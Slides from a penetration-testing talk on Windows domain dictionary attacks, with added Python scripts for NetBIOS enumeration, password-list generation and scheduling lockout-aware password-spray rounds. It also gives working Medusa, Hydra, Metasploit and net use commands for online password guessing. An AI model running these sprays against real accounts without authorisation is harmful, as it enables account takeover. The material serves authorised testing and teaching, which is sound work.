2. Who am I?
Scott Sutherland
• Security Consultant @ NetSPI
• Over 10 years of consulting experience
• Security researcher: blogs, white papers, tools, etc.
3. Presentation Goals
• Identify the value of dictionary attacks
• Provide new penetration testers with a safe
approach to Windows dictionary attacks
• Provide security professionals with questions
they should be asking their contractors
5. Why dictionary attacks?
What are the goals?
• Identify accounts configured with weak or
default passwords – “It’s human nature”
• Use accounts as entry points during penetration
tests
What’s the impact?
• Unauthorized access to critical:
‒ Systems
‒ Applications
‒ Data
• User impersonation
6. Are There Alternatives?
Yes.
Approaches typically include:
• Cracking password hashes offline with:
‒ Pre-computed hash libraries like rainbow tables
‒ Brute-force and dictionary techniques using tools like Hashcat and John the Ripper
• Dumping clear-text passwords from interactive sessions with Mimikatz
Both of these need something you already have (a hash dump or an admin session on a host); an online dictionary attack is what gets you that first foothold.
8. Dictionary Attacks: Process Overview
Windows Dictionary Attack Process
1. Identify domains
2. Enumerate domain controllers
3. Enumerate domain users
4. Enumerate domain lockout policy
5. Create a dictionary
6. Perform Attack
9. Identify Domains: Methods
Unauthenticated Methods
• DHCP Information
• NetBIOS Queries
• DNS Queries
• Sniffing Network Traffic
• Review RDP drop down lists
Authenticated Methods
• Review the output of the SET command for “USERDNSDOMAIN” (and “USERDOMAIN”, the NetBIOS form)
• Review the registry for the default logon domain (DefaultDomainName under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon)
10. Identify Domains: Tools
DHCP info [Auth: No]
  ipconfig /all  (look at the connection-specific DNS suffix and the DNS suffix search list)
NetBIOS queries [Auth: No]
  nbtstat -A <IP>  (the <00> GROUP entry in the name table is the domain or workgroup name)
DNS queries [Auth: No]
  nmap -sL <IP range> -oA output_rdns  (list scan: reverse-DNS only, no packets to the targets)
  ./reverseraider -r <IP range>
  ./dnswalk victim.com.
  perl fierce.pl -dns <domain> -threads 5 -file <domain>-dns.output
Sniffing [Auth: No]
  Wireshark (GUI); filter on “browser” to see Windows browser announcements, which carry the domain name
  NetworkMiner (GUI)
  EtherApe (GUI)
RDP drop-down [Auth: No]
  nmap -sS -Pn -p 3389 <IP range>
  Then connect with an RDP client and read the domain list on the logon screen (hosts that require NLA will not show it before you authenticate)
11. Enumerate DCs: Methods
Unauthenticated Methods
• DNS Queries
• RPC Queries
• Port Scanning
• NetBIOS Scanning
Authenticated Methods
• NET GROUP commands
• LDAP Queries
12. Enumerate DCs: Tools
DNS queries [Auth: No]
  nslookup -type=SRV _ldap._tcp.<domain>
  nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>  (lists only the domain controllers)
RPC queries [Auth: No]
  nltest /dclist:<domain>
  FindPDC <domain> <request count>
Port scanning [Auth: No]
  nmap -sS -Pn -p 88,389,636,3268 <IP range>  (Kerberos, LDAP, LDAPS, global catalog; in a Windows domain only DCs serve 88 and 3268)
NetBIOS scanning [Auth: No]
  for /f "tokens=*" %i in ('type ips.txt') do nbtstat -A %i
  (a host that registers the domain name with suffix <1C> is a domain controller)
NET GROUP command [Auth: Yes]
  net group "Domain Controllers" /domain
LDAP queries [Auth: Yes and No]
  LDAP Administrator (GUI tool)
  Hyena (GUI tool)
  adfind -b -sc dcdmp <domain> -gc | grep -i ">name:" | gawk -F " " "{print $2}" | sort | uniq
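The NetBIOS rows in the two tables above do the same job from different angles: the <00> GROUP name on any host tells you its domain, and the <1C> GROUP name marks a domain controller. The following is an added example, not from the original slides or from NetSPI: a Python parser for saved `nbtstat -A` output that sorts a batch of hosts into domains, DCs and members. The nbtstat text, host names, domain CORP, IPs and MACs are constructed samples, not captures.

```python
import re
from collections import defaultdict

# Constructed sample: what "nbtstat -A 192.168.1.10" prints for a domain
# controller named DC01 in the NetBIOS domain CORP (values made up).
SAMPLE_DC = """
Local Area Connection:
Node IpAddress: [192.168.1.50] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    DC01           <00>  UNIQUE      Registered
    CORP           <00>  GROUP       Registered
    CORP           <1C>  GROUP       Registered
    DC01           <20>  UNIQUE      Registered
    CORP           <1B>  UNIQUE      Registered
    CORP           <1E>  GROUP       Registered
    CORP           <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered

    MAC Address = 00-0C-29-AA-BB-CC
"""

# Constructed sample for an ordinary member workstation in the same domain.
SAMPLE_WS = """
Local Area Connection:
Node IpAddress: [192.168.1.50] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    WS17           <00>  UNIQUE      Registered
    CORP           <00>  GROUP       Registered
    WS17           <20>  UNIQUE      Registered
    CORP           <1E>  GROUP       Registered

    MAC Address = 00-0C-29-DD-EE-FF
"""

# What you get when NetBIOS over TCP/IP is disabled or filtered (constructed).
SAMPLE_NONE = """
Local Area Connection:
Node IpAddress: [192.168.1.50] Scope Id: []
    Host not found.
"""

# One registered name-table row: name, two-hex-digit suffix, UNIQUE or GROUP.
ENTRY_RE = re.compile(
    r"^\s*(?P<name>.+?)\s*<(?P<suffix>[0-9A-Fa-f]{2})>\s+(?P<kind>UNIQUE|GROUP)\s+Registered",
    re.MULTILINE,
)


def parse_nbtstat(output):
    """Return [(name, suffix, kind), ...] for every registered entry in nbtstat -A text."""
    return [(m["name"], m["suffix"].upper(), m["kind"]) for m in ENTRY_RE.finditer(output)]


def classify(entries):
    """Interpret the well-known suffixes:
    <00> UNIQUE  workstation service    -> host name
    <00> GROUP   domain/workgroup name  -> the domain this host belongs to
    <1C> GROUP   domain controllers     -> only DCs register this
    <1B> UNIQUE  domain master browser  -> normally the PDC emulator
    """
    info = {"host": None, "domain": None, "is_dc": False, "is_pdc": False}
    for name, suffix, kind in entries:
        if suffix == "00" and kind == "UNIQUE" and info["host"] is None:
            info["host"] = name
        elif suffix == "00" and kind == "GROUP":
            info["domain"] = name
        elif suffix == "1C" and kind == "GROUP":
            info["is_dc"] = True
            info["domain"] = info["domain"] or name
        elif suffix == "1B" and kind == "UNIQUE":
            info["is_pdc"] = True
    return info


def summarize(outputs):
    """outputs: {ip: nbtstat text}. Returns {domain: {"dcs": [...], "members": [...]}}.
    Hosts with no name table (NBT disabled, filtered, or down) are skipped."""
    domains = defaultdict(lambda: {"dcs": [], "members": []})
    for ip, text in outputs.items():
        info = classify(parse_nbtstat(text))
        if info["domain"] is None:
            continue
        bucket = "dcs" if info["is_dc"] else "members"
        domains[info["domain"]][bucket].append((ip, info["host"]))
    return dict(domains)


if __name__ == "__main__":
    result = summarize({"192.168.1.10": SAMPLE_DC, "192.168.1.23": SAMPLE_WS, "192.168.1.40": SAMPLE_NONE})
    for domain, hosts in result.items():
        print(domain, "DCs:", hosts["dcs"], "members:", hosts["members"])
```

Feed it the output of the `for /f ... nbtstat -A %i` loop from the table (redirect each host's output to a file keyed by IP). A host missing from the result is not proof it is outside the domain; NBT-NS is often disabled, so cross-check with the DNS SRV records.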
16. Get Domain Lockout Policy: Methods
Unauthenticated Methods
• RPC endpoints
Authenticated Methods
• NET ACCOUNTS command
What does it all mean?
• Threshold, duration, and window. Sample output:
Lockout threshold: 5
Lockout duration (minutes): 15
Lockout observation window (minutes): 15
• Threshold: bad-password attempts an account can absorb before it is locked (0, shown as “Never”, means no lockout)
• Observation window: the period over which those attempts are counted; the counter resets once the window passes with no new failure
• Duration: how long the account stays locked (0 means until an administrator unlocks it)
17. Get Domain Lockout Policy: Tools
RPC queries [Auth: Yes and No (null session, if the DC still allows one)]
  enum -P <IP>
  dumpsec.exe /computer=\\<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt
NET ACCOUNTS command [Auth: Yes]
  net accounts /domain  (without /domain you get the local machine's policy, not the domain's)
18. Create a Dictionary: Methods
Classics Still Work
• Blank
• Username as password
• password
Common Formulas = Most Effective
• <Password><Number>
• <Companyname><Number>
• <Season><Year>
• <Sports team><Number>
Popular Dictionaries
• Metasploit dictionaries
• RockYou
• FuzzDB
• John the ripper
19. Create a Dictionary: Tools
Classics
  Blank password
  Username as password
  “password” as password
Formulas
  <Password><Number>
  <Companyname><Number>
  <Season><Year>
  <Sports team><Number>
Your brain! Think of keywords relative to the target company and its geographic location and you'll get more out of your dictionary attacks.
Dictionary URLs / lists
  RockYou          http://www.skullsecurity.org/wiki/index.php/Passwords
  FuzzDB           http://code.google.com/p/fuzzdb/
                   https://github.com/rustyrobot/fuzzdb
  John the Ripper  http://www.openwall.com/wordlists/
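The formulas on these two slides are mechanical enough to generate rather than type. The following is an added example, not from the original slides or from NetSPI: a Python generator that applies the classics and the <Keyword><Number>, <Keyword><Year> and <Season><Year> formulas to target-specific keywords, ordered so the most likely guesses come first. The company name “acme”, the sports team and the years are constructed inputs for illustration.

```python
from itertools import chain

# The classics from the slide. Username-as-password is left to the attack tool
# (USER_AS_PASS in smb_login, or a per-user loop), since it differs per account.
CLASSICS = ("", "password", "Password", "Password1")
SEASONS = ("Spring", "Summer", "Fall", "Autumn", "Winter")


def variants(word):
    """Capitalisation forms people actually type: as given, Capitalised, lower, UPPER."""
    out = []
    for v in (word, word.capitalize(), word.lower(), word.upper()):
        if v and v not in out:
            out.append(v)
    return out


def formula_candidates(keywords, years, numbers=range(1, 10), suffixes=("", "!")):
    """<Keyword><Number>, <Keyword><Year> and <Season><Year> (plus two-digit years),
    each with and without a trailing '!'. keywords: company, sports team, city, ..."""
    out = []
    for base in keywords:
        for word in variants(base):
            for n in numbers:
                out.extend(f"{word}{n}{s}" for s in suffixes)
            for y in years:
                out.extend(f"{word}{y}{s}" for s in suffixes)
    for season in SEASONS:
        for y in years:
            for s in suffixes:
                out.append(f"{season}{y}{s}")
                out.append(f"{season}{str(y)[-2:]}{s}")
    return out


def build_dictionary(keywords, years, max_size=None):
    """Classics first (most likely to hit), then formulas; de-duplicated, order kept.
    Cap with max_size so the list divides into a known number of spray rounds."""
    seen = set()
    ordered = []
    for cand in chain(CLASSICS, formula_candidates(keywords, years)):
        if cand not in seen:
            seen.add(cand)
            ordered.append(cand)
    return ordered[:max_size] if max_size else ordered


if __name__ == "__main__":
    # Constructed target: fictional company "Acme" in Minneapolis, engagement in 2014.
    words = build_dictionary(["acme", "Vikings", "Minneapolis"], [2013, 2014])
    print(len(words), "candidates; first ten:", words[:10])
    with open("passwords.txt", "w") as fh:
        fh.write("\n".join(words) + "\n")
```

The output file drops straight into the `-P passwords.txt` / `PASS_FILE` arguments of the tools on slide 21. Keep the list short and ordered: with a lockout threshold of 5 you get three guesses per round, so the first three lines matter far more than the three hundredth.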
20. Perform Dictionary Attack: Rules
The Rule to Live By:
Respect the lockout policy
• General idea: attempt a few passwords against all of the domain users each round, not 1,000 passwords against one user. The bad-password counter is kept per account, so spreading the attempts across users is what keeps every account under the threshold.
• Subtract 2 from the lockout threshold to get the attempts per round.
Example: Lockout threshold=5, Attempts per round=3 (the margin covers a user's own typos and earlier failures you cannot see)
• Wait 5 to 10 minutes beyond the observation window before the next round, so every account's counter has reset.
• A threshold of 0 (“Never”) means no lockout, but every failure is still logged on the DCs; and on Server 2008 and later, a fine-grained password policy can give some users a stricter threshold than net accounts reports.
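The policy fields explained on slide 16 and the rounds rule on this slide fit together as a small scheduler. The following is an added example, not from the original slides or from NetSPI: Python that parses `net accounts /domain` output into threshold, duration and window, then splits a dictionary into rounds of threshold minus 2 passwords with a wait of window plus 10 minutes between them. The `net accounts` text and the dictionary are constructed samples; the margin and slack values are the slide's rule of thumb, not a Windows constant.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample of "net accounts /domain" output (made-up values, not a capture).
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           15
Lockout observation window (minutes):                 15
Computer role:                                        PRIMARY
The command completed successfully.
"""

# Same domain with lockout disabled: net accounts then prints "Never" for the threshold.
SAMPLE_NO_LOCKOUT = re.sub(r"^(Lockout threshold:\s*)5$", r"\g<1>Never",
                           SAMPLE_NET_ACCOUNTS, flags=re.MULTILINE)


@dataclass
class LockoutPolicy:
    threshold: Optional[int]  # None means lockout is disabled
    duration_min: int
    window_min: int


def parse_net_accounts(text):
    """Pull threshold, duration and observation window out of net accounts output."""
    def field(label):
        # label, optional "(minutes)", colon, whitespace, value
        m = re.search(rf"^{re.escape(label)}[^:]*:\s*(\S+)", text, re.MULTILINE)
        if not m:
            raise ValueError(f"field not found: {label}")
        return m.group(1)

    thr = field("Lockout threshold")
    return LockoutPolicy(
        threshold=None if thr == "Never" else int(thr),
        duration_min=int(field("Lockout duration")),
        window_min=int(field("Lockout observation window")),
    )


def plan_rounds(policy, passwords, safety_margin=2, slack_min=10):
    """Split the dictionary into spray rounds that respect the policy.

    Each round sprays at most (threshold - safety_margin) passwords against
    every user, then waits (observation window + slack) minutes so each
    account's bad-password counter has reset before the next round starts.
    """
    if policy.threshold is None:
        per_round, wait = max(len(passwords), 1), 0   # no lockout configured
    else:
        per_round = policy.threshold - safety_margin
        if per_round < 1:
            raise ValueError("threshold too low to spray safely with this margin")
        wait = policy.window_min + slack_min
    rounds = [{"passwords": passwords[i:i + per_round], "wait_minutes": wait}
              for i in range(0, len(passwords), per_round)]
    if rounds:
        rounds[-1]["wait_minutes"] = 0   # nothing to wait for after the last round
    return rounds


def total_minutes(rounds):
    """Wall-clock time spent waiting between rounds (the attempts themselves excluded)."""
    return sum(r["wait_minutes"] for r in rounds)


if __name__ == "__main__":
    policy = parse_net_accounts(SAMPLE_NET_ACCOUNTS)
    dictionary = ["", "password", "Password1", "Summer2014", "Acme1", "Acme2014", "Winter14"]
    for i, r in enumerate(plan_rounds(policy, dictionary), 1):
        print(f"round {i}: spray {r['passwords']} across all users, then wait {r['wait_minutes']} min")
```

Write each round's password list to its own file and point the tool on slide 21 at that file; the planner tells you how long the whole dictionary will take before you start, which is also the number to put in front of the client when you explain why the test will not be finished in an hour.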
21. Perform Dictionary Attack: Tools
Medusa [Linux]
  medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt
Bruter [Windows]
  Easy-to-use GUI; no CLI that I know of.
Metasploit smb_login [Windows and Linux]
  ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_login THREADS=5 BLANK_PASSWORDS=true USER_AS_PASS=true PASS_FILE=c:\passwords.txt USER_FILE=c:\allusers.txt SMBDomain=. RHOSTS=192.168.1.1 E
  (SMBDomain=. tests local accounts; set SMBDomain=<domain> to test domain accounts)
Hydra [Windows and Linux]
  hydra -L users.txt -P passwords.txt -o credentials.txt <ip> smb
Batch script [Windows]
  for /f "tokens=*" %a in ('type passwords.txt') do net use \\<ip>\IPC$ /user:<domain>\<user> %a
  (after a hit, run net use \\<ip>\IPC$ /delete, or the next attempt fails with error 1219 “multiple connections” instead of testing the password)
Whatever the tool, keep each round's password file to threshold-2 entries: given a multi-password file, hydra and medusa work through all of one user's passwords before moving to the next user (hydra's -u flag loops over users first), and the batch loop above throws the whole file at a single account.
22. Conclusions
• There is more than one way to do
everything!
• Enumerate all available options
• It’s easy to lock out accounts – respect the
lockout policy
• Always ask contractors what their approach
is to reduce the chance of account lockouts
during penetration tests